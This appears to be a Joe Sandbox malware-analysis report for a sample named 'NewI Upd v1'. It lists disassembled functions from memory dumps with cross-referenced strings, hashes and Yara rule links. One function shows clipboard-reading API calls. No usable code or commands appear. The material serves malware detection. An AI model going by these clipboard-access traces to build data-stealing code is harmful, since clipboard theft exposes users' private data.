], xrefs: 00413878
v, xrefs: 004141B9
X, xrefs: 00413177
t, xrefs: 004132D1
k, xrefs: 00413D1E
h, xrefs: 00412C44
e, xrefs: 004127EA
`, xrefs: 0041324F
i, xrefs: 00413A28
#, xrefs: 0041345F
;, xrefs: 00413948
D, xrefs: 00413EAB
n, xrefs: 00412C14
t, xrefs: 0041443E
`, xrefs: 00412C84
t, xrefs: 00413F58
t, xrefs: 004141C3
), xrefs: 004138F8
u, xrefs: 004141BE
', xrefs: 004128AC
b, xrefs: 00412C74
l, xrefs: 00412C24
", xrefs: 00412E8B
+, xrefs: 004138B8
w, xrefs: 004132B9
Y, xrefs: 00413918
2, xrefs: 004129A5
4, xrefs: 004139B8
~, xrefs: 00413DDE
{, xrefs: 00412560
(, xrefs: 00412AC8
v, xrefs: 004140B6
?, xrefs: 00413CE6
d, xrefs: 00413D0E
9, xrefs: 00413CB6
`, xrefs: 00413DEE
|, xrefs: 00413847
t, xrefs: 00414353
j, xrefs: 00412C34
M, xrefs: 00412D5E
v, xrefs: 00413F4E
v, xrefs: 00414349
M, xrefs: 00413978
v, xrefs: 004131B7
u, xrefs: 004132C9
H, xrefs: 004139F8
D, xrefs: 0041429E
R, xrefs: 00413898
1, xrefs: 00413A08
7, xrefs: 00413CA6
u, xrefs: 00413F53
t, xrefs: 004140C6
X, xrefs: 00413888
w, xrefs: 004131BF
?, xrefs: 00413086
3, xrefs: 00413C86
w, xrefs: 004140AE
1, xrefs: 00413C76
@, xrefs: 004128B1
,, xrefs: 004138C8
?, xrefs: 00412438
w, xrefs: 004141B4
%, xrefs: 00413096
+, xrefs: 004130A6
f, xrefs: 00412C54
d, xrefs: 00412C64
u, xrefs: 004131AF
p, xrefs: 00413D6E
;, xrefs: 00413CC6
_, xrefs: 00413838
w, xrefs: 0041442F
0, xrefs: 00413998
5, xrefs: 00413C96
v, xrefs: 00414434
u, xrefs: 0041434E
p6\|, xrefs: 00412FED
/, xrefs: 00413908
v, xrefs: 004132C1
u, xrefs: 004140BE
g, xrefs: 00413076
a, xrefs: 00413DF6
=, xrefs: 00413CD6
,, xrefs: 00412E81
y, xrefs: 00413A18
-, xrefs: 00412E86
L, xrefs: 00412D59
8, xrefs: 004124D1
r, xrefs: 00413928
k, xrefs: 00413408

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "$#$%$'$($)$+$+$+$,$,$-$/$0$1$1$2$3$4$5$7$8$9$;$;$=$?$?$?$@$D$D$H$L$M$M$R$X$X$Y$]$_$`$`$`$a$b$c$d$d$e$f$f$g$h$h$i$j$k$k$l$n$p$p6\|$r$t$t$t$t$t$t$u$u$u$u$u$u$u$v$v$v$v$v$v$v$w$w$w$w$w$w$w$y${$|$~$~
API String ID: 0-3922855715
Opcode ID: d15826c9f14f5361a366bcb91ba35dad3d166dbc22a6bd6b82ce1b42492383bf
Instruction ID: ca1df240efd254c8a753c0f6f00f1bbcc15ea8cc277f5bdd8d427bdcda22e9b8
Opcode Fuzzy Hash: d15826c9f14f5361a366bcb91ba35dad3d166dbc22a6bd6b82ce1b42492383bf
Instruction Fuzzy Hash: C213D17150C7C08AD3349B3888843EFBBD1ABD6324F088A6ED5E9873C2D6B98585C757

Function 004370E8 Relevance: 62.8, Strings: 50, Instructions: 302COMMON

Download Yara Rule

Strings

p, xrefs: 00437226
0, xrefs: 004373DE
4, xrefs: 00437148
P, xrefs: 004371A3
u, xrefs: 004371BA
P, xrefs: 0043722A
L, xrefs: 004373F4
0, xrefs: 00437156
=, xrefs: 00437172
Q, xrefs: 00437102
wvut, xrefs: 00437456
&, xrefs: 004373FC
N, xrefs: 0043720E
1, xrefs: 0043731E
>, xrefs: 004372DD
*, xrefs: 0043711E
3, xrefs: 00437306
}, xrefs: 004371DA
L, xrefs: 00437216
s, xrefs: 0043719C
r, xrefs: 0043721E
4, xrefs: 00437326
t, xrefs: 00437236
Z, xrefs: 004371BE
V, xrefs: 00437110
&, xrefs: 0043730E
V, xrefs: 004371AE
9, xrefs: 00437164
T, xrefs: 004371B6
8, xrefs: 00437316
O, xrefs: 004370F4
@, xrefs: 004371E6
w, xrefs: 00437232
B, xrefs: 004371DE
G, xrefs: 004372FE
<, xrefs: 004372D4
v, xrefs: 0043722E
D, xrefs: 004371F6
H, xrefs: 00437206
%, xrefs: 004373F8
;, xrefs: 0043732E
9, xrefs: 00437180
R, xrefs: 00437195
X, xrefs: 004371C6
J, xrefs: 004371FE
^, xrefs: 004371CE
\, xrefs: 004371D6
F, xrefs: 004371EE
4, xrefs: 0043718E
F, xrefs: 0043713A

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: %$&$&$*$0$0$1$3$4$4$4$8$9$9$;$<$=$>$@$B$D$F$F$G$H$J$L$L$N$O$P$P$Q$R$T$V$V$X$Z$\$^$p$r$s$t$u$v$w$wvut$}
API String ID: 2994545307-756363763
Opcode ID: 8fc1f82e5ec79e7326546071c247b4cc8a19e854e0bdbde1a1cfd2304ba8f530
Instruction ID: 4e76855f6066dd4eb485e3e06d037ce46397e90df97b78c63ae3993a03d574f8
Opcode Fuzzy Hash: 8fc1f82e5ec79e7326546071c247b4cc8a19e854e0bdbde1a1cfd2304ba8f530
Instruction Fuzzy Hash: A2E1A221D087E98EDB22CA7C88443DDBFB15B57324F1842D9D4E8AB3D2C7790A46CB56

Function 00632920 Relevance: 16.3, Strings: 9, Instructions: 5087COMMON

Download Yara Rule

Strings

2, xrefs: 006345FC
3oS, xrefs: 006329D0
S;{|, xrefs: 00633834
~, xrefs: 0063345B
2, xrefs: 0063624A
Huj, xrefs: 00633251, 0063389B, 00633E55, 006340DC, 0063453C, 0063489B, 00635B0E, 00636EEF
!}Uv, xrefs: 006341F4
`%FA, xrefs: 0063667E
97I., xrefs: 00636A0A

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: !}Uv$2$2$3oS$97I.$Huj$S;{|$`%FA$~
API String ID: 0-2719721827
Opcode ID: 254860828acf687303a66758eb0c445a09319fc6c29de383ac60894cf6034e39
Instruction ID: e63c8336ff64e7ae97e0a25fb85588e778d1b1fe0ee73cb034f33b1833d46ac6
Opcode Fuzzy Hash: 254860828acf687303a66758eb0c445a09319fc6c29de383ac60894cf6034e39
Instruction Fuzzy Hash: B3C3DC71D00269DFCB44CFA9D9906ECBBF1BF58310F24816AE859EB251E334AA85CF54

Function 0063B180 Relevance: 15.5, Strings: 9, Instructions: 4271COMMON

Download Yara Rule

Strings

S, xrefs: 0063E548
ZVg, xrefs: 0063B746
W, xrefs: 0063E0EF
i4, xrefs: 0063B767
|BWy, xrefs: 0063B249
Huj, xrefs: 0063B9D6, 0063CC52, 0063D6FC, 0063D9AF, 0063E582, 0063E65D, 0063ED01
|BWy, xrefs: 0063BB39
UsUR, xrefs: 0063CE09
^H, xrefs: 0063D95F

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ZVg$Huj$S$UsUR$W$i4$|BWy$|BWy$^H
API String ID: 0-2516949512
Opcode ID: 8c57e5f441fc099b7a9c9a329f12ab5a7da1ad4fc61f35407fe02ae5c6fa0045
Instruction ID: db40d2354aa937e4094fe2e55e66e06bcf1fb63d8534e8814e1e53c73a63c47d
Opcode Fuzzy Hash: 8c57e5f441fc099b7a9c9a329f12ab5a7da1ad4fc61f35407fe02ae5c6fa0045
Instruction Fuzzy Hash: CA93FE75D01259CFCB08CFA9E9906ECBBF1BF58310F14826AE549EB352E2386A45CF54

Function 004243CC Relevance: 14.6, Strings: 11, Instructions: 814COMMON

Download Yara Rule

Strings

30, xrefs: 00425A26
NC, xrefs: 004254B8
+@, xrefs: 004254AD
pq, xrefs: 0042562E
71, xrefs: 00425A31
T>, xrefs: 004254A2
sLm, xrefs: 00424FCF
!S#], xrefs: 0042534F
OK, xrefs: 004254C3
):, xrefs: 004257F0
-?, xrefs: 00425A3C

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: !S#]$):$+@$-?$30$71$NC$OK$T>$pq$sLm
API String ID: 0-912133193
Opcode ID: b3dff2b830bc2c487d9d64d9733e8c798e62da02a187ea3cf1f423753279af85
Instruction ID: d38d6533a88ebf4fdfd9ca15f00f2b02f71a4e8ed76e297c40cdad5d3321f5c8
Opcode Fuzzy Hash: b3dff2b830bc2c487d9d64d9733e8c798e62da02a187ea3cf1f423753279af85
Instruction Fuzzy Hash: 1BA2F7B420C7C58AD230CF24D402B9FBAF2EB92304F008D2DD5DA6B652D7B5464ACB97

Function 00638720 Relevance: 14.5, Strings: 10, Instructions: 2049COMMON

Download Yara Rule

Strings

0, xrefs: 00639DC9
}?0@, xrefs: 00638CCB
lSM, xrefs: 00639582
~, xrefs: 006397C0
Huj, xrefs: 0063895D, 00638D56, 006394F7, 0063A0ED, 0063A456, 0063A481
}S, xrefs: 0063A0E3
D, xrefs: 0063977E
X4, xrefs: 00639850
4 , xrefs: 00638E52
UL, xrefs: 0063A1E3

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 4 $0$D$Huj$UL$X4$lSM$}?0@$}S$~
API String ID: 0-3046833305
Opcode ID: a0c1cc246183db029ee1a9a1f304fcd63be3c5d45b4dc7abf93058ad5c18921a
Instruction ID: 5fcc7de17b623d3f450010cb94dda8a658766e3dc32a241ca383bcb3a3400d98
Opcode Fuzzy Hash: a0c1cc246183db029ee1a9a1f304fcd63be3c5d45b4dc7abf93058ad5c18921a
Instruction Fuzzy Hash: 23231275D002599FCB04CFA9D9906EDBBF1BF58310F14826AE859EB391D338AA45CF90

Function 006316D0 Relevance: 13.7, Strings: 10, Instructions: 1187COMMON

Download Yara Rule

Strings

.a, xrefs: 00631E2B
y, xrefs: 00631A7C
.a, xrefs: 00632412
geHC, xrefs: 006321D9
Huj, xrefs: 00631856, 00631E20, 006320C3, 00632247, 006324E4, 006325B8, 00632735, 00632836
^, xrefs: 00631A13
.a, xrefs: 00631D44
^, xrefs: 006317EC
z_rQ, xrefs: 00631CBA
<, xrefs: 006318B9

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: .a$.a$.a$<$Huj$^$^$geHC$y$z_rQ
API String ID: 0-1735947152
Opcode ID: 5f87ab08b39904363f4e095d996773c4707175e9a8c605a4c9b85acc9063eb15
Instruction ID: 0566879bd6568087094e573ff4feeff0abdc8bebccd6739eb10b42669de3e0ac
Opcode Fuzzy Hash: 5f87ab08b39904363f4e095d996773c4707175e9a8c605a4c9b85acc9063eb15
Instruction Fuzzy Hash: 3EC22275D002599FCB44CFA9E8906EDBBF1FB18310F14826AE955EB352D338AA45CF90

Function 0041E750 Relevance: 13.4, Strings: 10, Instructions: 862COMMON

Download Yara Rule

Strings

.9"0, xrefs: 0041EA98
sRn, xrefs: 0041EA70
qtl+, xrefs: 0041E901
(,\3, xrefs: 0041EA90
?RKm, xrefs: 0041EAB8
Ov/k, xrefs: 0041EAA8
x]&1, xrefs: 0041EAA0
CD[E, xrefs: 0041EAB0
WN, xrefs: 0041EB30
z`~p, xrefs: 0041EA38

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: (,\3$.9"0$?RKm$CD[E$Ov/k$WN$qtl+$sRn$x]&1$z`~p
API String ID: 0-1908156566
Opcode ID: 29abc7dc8bcc7f9dc147f1c3bd956d6b62cd5e3193b40bb57e01d0390ab1d9d6
Instruction ID: 9231c3c20a13a80d0cbcc71521262949944d1c5678e50108b08bd518a7e0b27a
Opcode Fuzzy Hash: 29abc7dc8bcc7f9dc147f1c3bd956d6b62cd5e3193b40bb57e01d0390ab1d9d6
Instruction Fuzzy Hash: 4B524B7450C3918FC721CF25C8406AFBFE1AF95314F088A6DE8E59B392D739894ACB56

Function 0040F3E0 Relevance: 13.2, Strings: 10, Instructions: 723COMMON

Download Yara Rule

Strings

, xrefs: 0040F581
Z, xrefs: 0040F8E2
[, xrefs: 0040F85C
}, xrefs: 0040F98B
L, xrefs: 0040FAE9
X, xrefs: 0040F655
i, xrefs: 0040FA4D
), xrefs: 0040F500
H, xrefs: 0040F71C
0, xrefs: 0040F645

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: $)$0$H$L$X$Z$[$i$}
API String ID: 0-262941025
Opcode ID: 7fb1d79b7715cad064d62cc4b1d36924b0aed90abdd30bdd4c2eed7bcacc9092
Instruction ID: d28a9ee8b7ba499d872567e678f045b2c42681d9a896adcfc532d2553a2cca44
Opcode Fuzzy Hash: 7fb1d79b7715cad064d62cc4b1d36924b0aed90abdd30bdd4c2eed7bcacc9092
Instruction Fuzzy Hash: 0052C57250C7908BC3249B39C4553AFBBE1AFC5324F198A7EE8D9973D2D67888058747

Function 00433030 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00433044
GetClipboardData.USER32 ref: 0043305F
GlobalLock.KERNEL32 ref: 00433078
GetWindowLongW.USER32 ref: 004330DE
GlobalUnlock.KERNEL32 ref: 004331BE
CloseClipboard.USER32 ref: 004331C7

Strings

&, xrefs: 00433130

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: &
API String ID: 2832541153-1010288
Opcode ID: 0732fd96032583f541cbd14d6f012155e390292909d7e0501bd99df8e6301cd0
Instruction ID: 8e5aa94e312a3b839f973b79403f92ee70d345bffa288f6cedf834e365f0509a
Opcode Fuzzy Hash: 0732fd96032583f541cbd14d6f012155e390292909d7e0501bd99df8e6301cd0
Instruction Fuzzy Hash: 89419E715087828EC314AF7C898925FBFE1AB86324F188B7DF0E6862D2D6788549C757

Function 0040CBF2 Relevance: 11.8, Strings: 9, Instructions: 560COMMON

Download Yara Rule

Strings

37!e, xrefs: 0040CFAD
W5AR, xrefs: 0040CE6B
hov-, xrefs: 0040CFA6
0"/<, xrefs: 0040CF8A
'8'4, xrefs: 0040CF91
QB, xrefs: 0040D0B7
9Z, xrefs: 0040D0B0
W5AR, xrefs: 0040D19B
0./$, xrefs: 0040CF83

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: '8'4$0"/<$0./$$37!e$9Z$QB$W5AR$W5AR$hov-
API String ID: 0-1170108656
Opcode ID: b61a1b2087bb24e9b6156ab693ed29b9da14a903d7f305707c631ed683c01369
Instruction ID: c25c77e71e1e0e1b927a2ef9d1d7b50b44196b9bfd68e40a72979bbcb7682b22
Opcode Fuzzy Hash: b61a1b2087bb24e9b6156ab693ed29b9da14a903d7f305707c631ed683c01369
Instruction Fuzzy Hash: D10201B1504781CFD326CF29C490A62BFE1FF56310B1A96ADC4969F762C739E806CB94

Function 004094E0 Relevance: 11.7, Strings: 9, Instructions: 411COMMON

Download Yara Rule

Strings

@#, xrefs: 00409614
s|vw, xrefs: 00409530
dRJA, xrefs: 00409564
>, xrefs: 00409890
ZZXd, xrefs: 00409873
sG}r, xrefs: 004095C4
b~Tx, xrefs: 004095DC
@{MG, xrefs: 004095AC
}|, xrefs: 0040969A

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: >$@#$@{MG$ZZXd$b~Tx$dRJA$sG}r$s|vw$}|
API String ID: 0-303658908
Opcode ID: 4f644ea3f462ae9b6cb773a3f962fca15526f8d7fdef69da37168f4836f0a623
Instruction ID: 5f5e6a1eacbf34fae869f758228e6cffb7ed53874615d65fdff1f03d33f18b5b
Opcode Fuzzy Hash: 4f644ea3f462ae9b6cb773a3f962fca15526f8d7fdef69da37168f4836f0a623
Instruction Fuzzy Hash: 81C1577264C3918BC3268F79849076BFBE0AFD6314F09497DE4D49B382D2798D06C79A

Function 0041C960 Relevance: 10.7, Strings: 8, Instructions: 696COMMON

Download Yara Rule

Strings

vw, xrefs: 0041CA54
;8, xrefs: 0041CEAE
jh, xrefs: 0041CD1B
F ]&, xrefs: 0041CE9E
C$C:, xrefs: 0041CEA6
G(U., xrefs: 0041CE8E
p, xrefs: 0041CE5E
bc`, xrefs: 0041CD2B

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ;8$C$C:$F ]&$G(U.$p$vw$bc`$jh
API String ID: 0-1888752554
Opcode ID: d6d3efda358e52c6362aa59ae341c7ebf9068fd22dfe1f0b6f717cb43f3b2044
Instruction ID: f13e8170dc4191d1302c5aae8fd647cb5b51dc7f906add8da76f4da51d8aae7d
Opcode Fuzzy Hash: d6d3efda358e52c6362aa59ae341c7ebf9068fd22dfe1f0b6f717cb43f3b2044
Instruction Fuzzy Hash: A71236B2A5C3108BC718DF69DC8129BBBE2EFD5314F09C92DE4D587351E6788909C78A

Function 004091F0 Relevance: 10.3, Strings: 8, Instructions: 322COMMON

Download Yara Rule

Strings

g~, xrefs: 00409276
GAuG, xrefs: 004092CE
n`ly, xrefs: 004092B6
il\l, xrefs: 0040929E
d`ba, xrefs: 004092AE
|zp?, xrefs: 004092C6
y&t, xrefs: 004092BE
k!9k, xrefs: 004092A6

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: GAuG$d`ba$g~$il\l$k!9k$n`ly$y&t$|zp?
API String ID: 0-1351409680
Opcode ID: 873c18baae070f6524d35b57998012487a997f700e2d69e4940c44571185dbcf
Instruction ID: 7a2fd4c55e8b00e8239b77c4b3f3a49de829b56b670d0dc54cdb87692afb1f0c
Opcode Fuzzy Hash: 873c18baae070f6524d35b57998012487a997f700e2d69e4940c44571185dbcf
Instruction Fuzzy Hash: 4081066150C3928BC315CB3984A076BFFD19FD6205F198A7EE4D69B3C6E2388D0AC756

Function 00425AFB Relevance: 9.4, Strings: 7, Instructions: 696COMMON

Download Yara Rule

Strings

\]", xrefs: 00425E63
X^, xrefs: 00425E5B
wvut, xrefs: 004261F0
g,!>, xrefs: 00425F6F
fo`a, xrefs: 00425D25
y,!>, xrefs: 00425FA4
wvut, xrefs: 00425B30

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: fo`a$g,!>$wvut$wvut$y,!>$X^$\]"
API String ID: 0-2684938175
Opcode ID: 9f49a31440bceca8724b722404acfce0b5a6123fd83804fd7ea6a26eadba025a
Instruction ID: 3fc7cad3b5ba877a26a3272c6b5ae996e6d938a73bd9e3eeec04a34aa2b07640
Opcode Fuzzy Hash: 9f49a31440bceca8724b722404acfce0b5a6123fd83804fd7ea6a26eadba025a
Instruction Fuzzy Hash: 3E1216366087218BC724DF24D8802BFB3E2FF99700F96892DE9C597350E7789A01DB46

Function 00411930 Relevance: 9.3, Strings: 7, Instructions: 545COMMON

Download Yara Rule

Strings

., xrefs: 0041193E
h, xrefs: 00411F66
R, xrefs: 00411BA3
H, xrefs: 00411990
", xrefs: 00411D63
p, xrefs: 00411ECA
y, xrefs: 00411CE6

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "$.$H$R$h$p$y
API String ID: 0-1877895494
Opcode ID: 64d779b0871a9e8e3ebf2b91ed8ce96c555fa9a28df7dbaf70c6a9258d014142
Instruction ID: 814d4cc2dc964bff8d85b4ad8c6d0cde489e35eb526fb56bc36b419b437a5494
Opcode Fuzzy Hash: 64d779b0871a9e8e3ebf2b91ed8ce96c555fa9a28df7dbaf70c6a9258d014142
Instruction Fuzzy Hash: 5222E372A0C7808BC324DF38C5953AFBBE1ABC9314F194A2EE5D997391D67888458B47

Function 00409960 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

<^-\, xrefs: 00409C4A
%R.P, xrefs: 00409C62
=):<, xrefs: 00409A0E, 00409A19
690213190D2228369D923F913F8AA6F7, xrefs: 00409A14
o\YZ, xrefs: 00409B32
Wd_h, xrefs: 00409B2A
!, xrefs: 00409BB0

Memory Dump Source

